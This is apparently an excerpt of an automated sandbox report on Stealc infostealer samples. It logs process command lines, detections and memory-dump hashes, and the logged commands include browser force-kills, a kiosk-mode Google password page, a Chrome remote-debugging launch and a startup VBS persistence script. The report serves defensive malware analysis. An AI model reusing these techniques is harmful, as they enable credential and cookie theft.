                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1003343001\24da741fb6.exe"
                                                                                                                                                                                                                                              Imagebase:0x370000
                                                                                                                                                                                                                                              File size:2'964'480 bytes
                                                                                                                                                                                                                                              MD5 hash:53014E825FFABBC0AC8A0AB1AEC76EE7
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 42%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                              Start time:02:16:22
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1003344001\0d8313073f.exe"
                                                                                                                                                                                                                                              Imagebase:0x610000
                                                                                                                                                                                                                                              File size:2'143'744 bytes
                                                                                                                                                                                                                                              MD5 hash:90CD56BFD041977B953EC0D6AC7F665C
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000D.00000002.2940306745.00000000015BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000D.00000002.2922718430.0000000000611000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000D.00000003.2559813189.0000000005310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:14
                                                                                                                                                                                                                                              Start time:02:16:27
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DiagTrack.vbs"
                                                                                                                                                                                                                                              Imagebase:0x7ff64aac0000
                                                                                                                                                                                                                                              File size:170'496 bytes
                                                                                                                                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                              Start time:02:16:29
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1003345001\203f60e481.exe"
                                                                                                                                                                                                                                              Imagebase:0x50000
                                                                                                                                                                                                                                              File size:919'552 bytes
                                                                                                                                                                                                                                              MD5 hash:C1FA8AC639C1D531A4C7CF311C056AB0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 47%, ReversingLabs
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:16
                                                                                                                                                                                                                                              Start time:02:16:29
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:taskkill /F /IM firefox.exe /T
                                                                                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                              Start time:02:16:29
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:18
                                                                                                                                                                                                                                              Start time:02:16:31
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                              Imagebase:0x8c0000
                                                                                                                                                                                                                                              File size:262'432 bytes
                                                                                                                                                                                                                                              MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                              Start time:02:16:31
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:taskkill /F /IM chrome.exe /T
                                                                                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                              Start time:02:16:31
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                              Start time:02:16:32
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:taskkill /F /IM msedge.exe /T
                                                                                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                              Start time:02:16:32
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                              Start time:02:16:32
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 1144
                                                                                                                                                                                                                                              Imagebase:0x10000
                                                                                                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                              Start time:02:16:32
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:taskkill /F /IM opera.exe /T
                                                                                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                              Start time:02:16:32
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                              Start time:02:16:32
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:taskkill /F /IM brave.exe /T
                                                                                                                                                                                                                                              Imagebase:0xa00000
                                                                                                                                                                                                                                              File size:74'240 bytes
                                                                                                                                                                                                                                              MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                              Start time:02:16:32
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                              Start time:02:16:33
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                              Start time:02:16:33
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                              Start time:02:16:33
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                              Start time:02:16:34
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                              Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                              Start time:02:16:34
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2324 -parentBuildID 20230927232528 -prefsHandle 2272 -prefMapHandle 2264 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81e41cdf-9cd7-4e6b-84b6-f40482f74e4a} 6864 "\\.\pipe\gecko-crash-server-pipe.6864" 253dc76dd10 socket
                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                              Start time:02:16:37
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4036 -parentBuildID 20230927232528 -prefsHandle 4400 -prefMapHandle 3816 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {67daa889-b47a-41d1-9d91-f60d147d808b} 6864 "\\.\pipe\gecko-crash-server-pipe.6864" 253ee211110 rdd
                                                                                                                                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                                                                                                                                              File size:676'768 bytes
                                                                                                                                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                              Start time:02:16:37
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                              Start time:02:16:40
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2528 --field-trial-handle=2252,i,12247254292580222694,14534572486204827192,262144 /prefetch:8
                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                              Start time:02:16:40
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1003346001\8a0ff7e068.exe"
                                                                                                                                                                                                                                              Imagebase:0x670000
                                                                                                                                                                                                                                              File size:2'866'688 bytes
                                                                                                                                                                                                                                              MD5 hash:01DDF9CC770BC558B2FAFFA43B9B5B12
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 37%, ReversingLabs
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:39
                                                                                                                                                                                                                                              Start time:02:16:50
                                                                                                                                                                                                                                              Start date:02/11/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\33QCBA038D3K2VF7AVBGWF5K.exe"
                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                              File size:2'866'688 bytes
                                                                                                                                                                                                                                              MD5 hash:01DDF9CC770BC558B2FAFFA43B9B5B12
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              • Detection: 37%, ReversingLabs
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Reset < >
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1705900370.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5180000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 094b33372de0961f479c6d9772678e378df77acf24e57b6b789351816578c68b
                                                                                                                                                                                                                                                • Instruction ID: 20ae37409b9b8b80aa8864ac2121c15948d35e11f90a315fe2d04b1127997250
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 094b33372de0961f479c6d9772678e378df77acf24e57b6b789351816578c68b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91F027DB14C408BE5139F291465D2BBAA5FAB8E6307330426B04397102E7980ACE5D30
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1705900370.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5180000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d169b302b52537cca41a8be8754c72b49e939c4786e939d24a8a08c7832b8f0c
                                                                                                                                                                                                                                                • Instruction ID: cab45ec45c1b1d14266ab6d4aa6274682bed085673baa88e1552deed984dc416
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d169b302b52537cca41a8be8754c72b49e939c4786e939d24a8a08c7832b8f0c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15F059D700C818AE8235B2A1069C2BB7B2FBB8E6317360426F0439B502E7990BCE4D21
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1705900370.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5180000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1379e4ed9f762537cd9b02190b96bc884e3d65672e04f5ea04cf0f2863b94ece
                                                                                                                                                                                                                                                • Instruction ID: a75f101bd0c30e302e84c7d2be70c134ff49e2481a79c237944ab4b8d843c475
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1379e4ed9f762537cd9b02190b96bc884e3d65672e04f5ea04cf0f2863b94ece
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43F050D704C50DFE5276F295868D6B77B6BBB4E630733052AB04397002E3940ACD9D71
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1705900370.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5180000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 37e7762dd139038db4e153b738e731af6e0586fea92a49b7a9530eb625fa0492
                                                                                                                                                                                                                                                • Instruction ID: 6058b0f5a08b91db700575cd2efa854f614f034a39666dacdb4d9daf0c8eeaff
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 37e7762dd139038db4e153b738e731af6e0586fea92a49b7a9530eb625fa0492
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFE055CB18840CAEC03071A11A4C3B3632F6B9A7307720125B053A1482A3A402CE4D20
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1705900370.0000000005180000.00000040.00001000.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_5180000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6670d818706e09dd1858522000821dfd59594797e9be8f2c6aef7168fbd35529
                                                                                                                                                                                                                                                • Instruction ID: c8768ed407c076bd47dbc1e833adc4bca6f67ef4df75e802237d94f16cdfceaa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6670d818706e09dd1858522000821dfd59594797e9be8f2c6aef7168fbd35529
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F901DFBF20D6196EB134E9516B9DEFA772EE6C6774332842AF802C9446E3504A4E08B1

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:10.4%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:6.5%
                                                                                                                                                                                                                                                Total number of Nodes:1313
                                                                                                                                                                                                                                                Total number of Limit Nodes:13
